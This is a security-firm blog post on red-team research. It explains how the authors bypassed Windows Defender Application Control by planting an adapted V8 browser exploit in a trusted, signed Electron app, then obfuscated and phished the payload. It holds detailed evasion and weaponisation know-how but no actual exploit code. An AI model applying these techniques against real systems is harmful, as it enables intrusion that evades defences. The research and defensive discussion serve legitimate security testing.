My IBM Log in Subscribe

Operationalizing browser exploits to bypass Windows Defender Application Control (WDAC)

14 May 2025

Authors

Valentina Palmiotti

Vulnerability and Exploit Researcher

Adversary Services, IBM X-Force

Windows Defender Application Control (WDAC) is a Windows security feature to help prevent unauthorized code (like malware or untrusted executables and scripts) from running on a system. It’s an application whitelisting mechanism that enforces policies that allow only explicitly trusted executables, scripts and drivers to run on a system. It’s frequently used in high-assurance or tightly controlled environments where security and system integrity are critical, like the ones the X-Force Red Adversary Simulation team is engaged to test.

A few weeks ago, my colleague Bobby Cooke published a blog post detailing a method for bypassing even the strictest WDAC policies by backdooring trusted Electron applications. I highly recommend reading his blog post to get a sense of how Electron applications use Node.js and how they can be backdoored.

As part of that research, he also open-sourced Loki C2, a Node.js-based command and control framework. Thanks to Bobby and Dylan Tran’s excellent work developing Loki C2, the X-Force Adversary Simulation team has managed to gain code execution on engagements in hardened environments that employ WDAC.

So, where does this research come in? The aforementioned technique does have one shortcoming: you are limited to executing JavaScript code only, and you can’t execute native code, such as loading DLLs or running EXEs. You also can’t execute shellcode to launch a stage 2 C2 payload. This blog post covers a technique we utilized to get around those restrictions.

To start, Bobby and I began reverse engineering signed Node.js modules loaded by Electron applications, looking for vulnerabilities that could grant low-level, instruction-level code execution. After some initial exploration and at the suggestion of jeffssh, my attention shifted to the V8 engine used by Node.js and by Chrome.

Bring your own vulnerable application

Instead of finding a vulnerability in a Node.js module, what about exploiting the V8 engine with an N-day?

The attack scenario is a familiar one: bring along a vulnerable but trusted binary, and abuse the fact that it is trusted to gain a foothold on the system. In this case, we use a trusted Electron application with a vulnerable version of V8, replacing main.js with a V8 exploit that executes stage 2 as the payload, and voila, we have native shellcode execution. If the exploited application is whitelisted/signed by a trusted entity (such as Microsoft) and would normally be allowed to run under the employed WDAC policy, it can be used as a vessel for the malicious payload.

In addition to being able to freely execute shellcode, this approach also has the benefit of executing shellcode in the context of a browser-like process, which has advantages. Behavior that might otherwise be flagged by EDR as suspicious, seems normal for a browser, such as having RWX memory mapped for Just-In-Time (JIT) code.

Man looking at computer

Strengthen your security intelligence 


Stay ahead of threats with news and insights on security, AI and more, weekly in the Think Newsletter. 


Prior work

This approach seemed straightforward enough, but I did have some open questions. Would a public Chrome V8 N-day exploit really work inside an Electron app? How does the V8 engine used in Chrome vary from the one in Node.js? What modifications will the exploit need? How can I debug this?

It turns out there is existing public work on V8 exploit exploitation in Electron apps, which, very sadly for me, I didn’t find until after I was done. Turb0 does an excellent job of covering the (somewhat agonizing) process of adapting a public v8 exploit and its corresponding read/write primitives to work inside an Electron application. Turb0’s blog post already covers a lot of the in-depth technical details of what I had to deal with, which I highly recommend checking out. The rest of this blog post will focus on the remaining stages of the exploit development cycle as it pertains to targeting Windows with the specific goal of creating a WDAC bypass and issues I encountered operationalizing the exploit for real-world use.

Version targeting

The very first thing I needed to do was figure out the exact targets. I needed to pick a trusted Electron application and choose a vulnerability to exploit it. I had very little browser exploitation experience before this, so the chosen vulnerability should have a public exploit to use as a starting point.

I wasn’t sure how V8 versions mapped to the version of V8 Electron uses or how to tell if it was really vulnerable. Electron’s version of V8 often lags behind the latest version of Chrome’s V8. Electron maintainers backport important security patches from newer versions into the version they’ve frozen for a particular Electron release. That means even if Electron uses an older version of V8, it doesn’t necessarily mean it’s vulnerable to a bug since a fix could have been backported. The cherry-picked patches they apply are stored here.

I decided the easiest approach would be to use a vulnerability that was patched after the application version was released. That way, there would be absolutely no chance that version of the app had been patched yet. After some digging, I found downloads for the past ~2 years of  VSCode releases. I had a decent range of vulnerable Microsoft-signed applications to pick from 😊.

Building and debugging

To start, I simply took a recent public V8 exploit PoC and backdoored the vulnerable Electron app with it, replacing main.js with the exploit, and crossed my fingers. Maybe it would just be that easy, right? I was hoping for at least a crash. To no one’s surprise, nothing happened when I launched the app. Begrudgingly, I knew I was going to need to build V8 to understand what was going on on a deeper level. By building V8 myself, I would be able to build the debug version (d8), get into the depths of the exploit, then adjust it for the specific version I was targeting.

What’s where and when? - Exploiting on different OSes and versions

My first goal was to establish a “ground truth” – replicating the exact environment where the exploit is known to work. Then, I could examine the differences between that version and the version I was targeting to understand what was going wrong.

Most of the public V8 exploits that I found targeted Linux. So I started by compiling V8 on Linux, checking out the exact commit that the public exploit I chose was targeting. I then ran the exploit to make sure it worked. Thankfully, it did. I now had my ground truth.

From there, I compiled the version of V8 that I was targeting (the same as used by the Electron app) but on Linux. The exploit didn’t work right off the bat. The benefit of building a project yourself is that you can have as much introspection into the code as you need. In particular, V8 has d8, the standalone shell for the V8 JavaScript engine, primarily used for testing, debugging and running JavaScript and WebAssembly code outside of a browser or Node.js environment. d8 has internal debug features enabled with the --allow-natives-syntax flag. In particular,%DebugPrint(value) , which prints the internal tagged representation of the value inside the V8 engine, including its address in memory.

With this, I could print the addresses of objects of interest and adjust the hardcoded offsets of the public exploit. Now I was getting somewhere. I just needed to port my exploit over to Windows.

Compiling an older version of V8 on Windows gave me a lot of headaches. I needed to fix a bunch of problems with dependencies, so I did some dubious internal code modifications. The details escape me now -- my brain has blocked them out for my own protection. After hours of struggling, I was finally able to compile the version I needed! To my surprise, the Linux modified exploit worked on Windows with no adjustments.

Now, all that was left was to test the exploit on the Electron app and hold my breath... Oops, didn’t work! But why?

At first, I was hopeful because the target did crash. After all, I hadn’t adapted the Linux payload for Windows, so I couldn’t expect anything interesting to happen. In order to confirm the behavior, I changed the exploit payload to execute at address 0x4141414141. This is a common technique exploit writers use to be able to see/prove they have obtained control of the program by controlling the instruction pointer address. However, after looking at the crash in WinDbg, I wasn’t seeing what I wanted. I was getting a segmentation fault when overwriting the targeted function pointer.

Remember that Electron cherry-picking V8 commits stuff I was talking about before? It turns out that even though the app was vulnerable to the bug I was using to exploit, the sandbox escape method the public exploit used was already patched via cherry pick. If you aren’t familiar with the V8 sandbox/memory cage, you can read about it here. Essentially, it’s a way to make V8 exploitation more difficult in the case of a vulnerability.

In order to realize what was happening, I needed to again build the targeted version of V8, this time applying the cherry-picked patches. In addition to the security patches, Node.js also applies specific Node.js patches to the version of V8 that Electron uses. It took me a long time to realize that I even needed to do this, as how Electron and Node.js deal with their various dependencies wasn’t immediately clear.

After a day or two of trying to make sure the version of V8 I was compiling was *identical* to my target and also reading up on recent sandbox escape techniques, I made progress. I was able to find an escape technique that would work for my target. After adjusting the exploit, I was finally able to crash the app with control of the instruction pointer. A sweet victory, I saw the end in sight...

Adapting exploit with a practical payload

At this point, all that was left to do was modify the public’s exploit payload to run our C2 payload instead.  This seemingly straightforward change proved to be more annoying than I thought. The public exploit’s Linux payload was a simple one to pop a shell, which was only a few bytes in size. The C2’s payload was... much larger than that.

If you know about coding in shellcode, you’ll know that writing Windows shellcode is more annoying than shellcode in Linux, mainly because there’s no simple way to make direct syscalls in a position-independent way like you can in Linux. The payload also needed to be “JOP smuggled” inside a floating point array:

Obviously, the entire stage C2 payload (which was multiple thousands of bytes large) could not execute like this. So, I needed to write a bootstrap payload that would map an executable page, copy the final payload to it and then jump to it.

Argument smuggling

The issue with the bootstrap payload is that while I had program control, I did not have a way to pass arguments to the payload that got executed. So, my smuggled shellcode would not know the address of the final payload from which to copy. I got around this by something I coined as “argument smuggling.”

I knew that the address of the overwritten JSFunction object would be stored in the rcx register. So, using the arbitrary write primitive, I stored the mapped page in one of the object’s fields that wouldn’t be needed. This took a bit of trial and error, as overwriting some offsets caused crashes. I did the same thing for the value to be copied and the offset where to copy it. The field’s offset could be hardcoded into the shellcode, so it would know where to copy the payload from. I called the payload n number of times, where n is the number of bytes to copy.

TurboFan JIT optimization

TurboFan, V8's optimizing compiler, threw some wrenches into my plans. Due to TurboFan’s optimizations, smuggling sequences of instructions that translated into multiple floating-points of the same value would result in only one instance of that value in memory. This imposed limitations on how often instructions could be repeated. I got around this by making my shellcode as compact as possible, and also varying the position of the smuggled instructions if I absolutely needed to repeat an instruction, such that the floating-point value was different and there were no repeat entries.

I also ran into issues copying shellcode if the stage 2 payload was too large, probably due to the number of times I needed to call the same stomped JSFunction and TurboFan, trying to optimize this. I eventually got around this by copying and pasting multiple loops to “WriteShellcode” instead of one big loop. Horrifically ugly, but it worked! Later, Bobby and Dylan swapped the C2 payload for a stager that retrieved the larger payload from blob storage, so the final payload didn’t need to be stored on disk. This also helped keep the file size of main.js to something reasonable.

Inconsistent offsets

Preparing for the real operational use of exploits should always include testing on different environments. For the context of the engagement, we did not know what environment the payload would be executing in, just that it was a Windows system that likely had WDAC enabled. Therefore, the exploit needed to work regardless of the OS. I was confident that since the application’s V8 version and all dependencies were contained within the app, not much variability would be encountered. I was incorrect in that assumption.

For reasons I don’t understand, the offset of the vulnerable function pointer to overwrite changed across Windows versions. This didn’t make sense because as I understand it, the offset distance is determined by the V8 JIT engine, whose libraries are loaded directly from the application package. This means that the exact same V8 libraries are loaded regardless of the OS. To make matters more confusing, the variation didn’t seem to follow any sort of pattern. The offset was sometimes off by 4 bytes on some versions of Windows (both older and newer). This was particularly annoying because there was no way (from what I could tell) to glean the proper offset from within the JavaScript exploit. The only way to calculate it was to utilize the debugging shell to read the memory address and do the math, which was obviously not an option from within the production Electron Application. TLDR: offsets variation can’t be calculated at exploit runtime.

Just-in-time exploit engineering

In order to get around the inconsistent offset issue, Bobby and Dylan re-engineered the exploit so that main.js would launch the exploit multiple times, trying the different possible offsets until it was successful. This was done by having the initial Code process perform a loop. This loop spawned child processes that would attempt the exploit with a unique offset. If the exploit failed, the child process would be terminated. If the exploit was a success, then the shellcode would execute and write a Mutex file before deploying the stage 2 C2. Once the exploit was a success, the initial process would exit the loop and sleep forever.

While this did mean that the wrong offset attempt would cause a crash, our testing revealed that there were no visible errors to the user, and the application functionality would still appear to work seamlessly. While not the cleanest solution and somewhat noisy because of the crashes, time was of the essence. This is what we call in the business “JIT xdev”, and it worked perfectly for our needs.

JS obfuscation and CI/CD payload

We obviously didn’t want the exploit to be obvious if we were caught and someone analyzed the application’s main.js entry point. To avoid that, we applied a JavaScript obfuscator on the exploit code, which made it virtually incomprehensible to the human eye. Thanks to the talents and dedication of Chris Spehn, who maintains the team’s payload CI/CD pipeline, we were able to streamline the delivery of this payload and re-obfuscated the code each time the payload was generated, so we could reuse the application indefinitely with different exploit code each time. This kept the payload from being signatured. This proved especially useful, since sadly, the first time we tried to use the capability, we were caught because the user flagged the phishing email 🙁. Interestingly, while the client’s blue team analyzed the application from the phishing email, they did not glean the purpose of the application, nor did they identify the embedded V8 exploit.

Remaining open questions

I still don’t quite understand why JITted function offsets were OS dependent, since all of the relevant V8 libraries are supposed to be bundled within the Electron application. If anyone has any idea of why this is, please let me know!

Future security considerations

Electron has rolled out an experimental feature for integrity that verifies the integrity of all the application’s files at run time. It has been available for macOS since version 16 and Windows since version 30. Application developers can enable this Electron fuse to ensure that none of the application files are tampered with. If they are, the process will automatically exit, and nothing gets executed.

This feature prevents modifying any of the Electron app’s packaged files, including main.js, and thwarts the discussed techniques. However, it’s yet to be implemented in the most popular applications. If and when this feature sees more widespread use, it should still be noted that older versions of the application, pre-integrity fuse, will remain vulnerable and usable for this attack.

Acknowledgements

Bobby Cooke & Dylan Tran – Helping operationalize the exploit

Dylan Tran – Diagram creation

Chris Spehn– Integrating this payload into our CI/CD pipeline (and all of the other thankless DevOps work you’ve done for the team)

jeffssh – Inspiration

j j - Being a master V8 hacker whose prolific V8 PoC's helped immensely

Mixture of Experts | 23 May, episode 56

Decoding AI: Weekly News Roundup

Join our world-class panel of engineers, researchers, product leaders and more as they cut through the AI noise to bring you the latest in AI news and insights.

Related solutions

Related solutions

Enterprise security solutions

Transform your security program with solutions from the largest enterprise security provider.

Explore security solutions
Cybersecurity services

Transform your business and manage risk with cybersecurity consulting, cloud and managed security services.

    Explore cybersecurity services
    Artificial intelligence (AI) cybersecurity

    Improve the speed, accuracy and productivity of security teams with AI-powered cybersecurity solutions.

    Explore AI cybersecurity
    Take the next step

    Whether you need data security, endpoint management or identity and access management (IAM) solutions, our experts are ready to work with you to achieve a strong security posture. Transform your business and manage risk with a global industry leader in cybersecurity consulting, cloud and managed security services.

    Explore cybersecurity solutions Discover cybersecurity services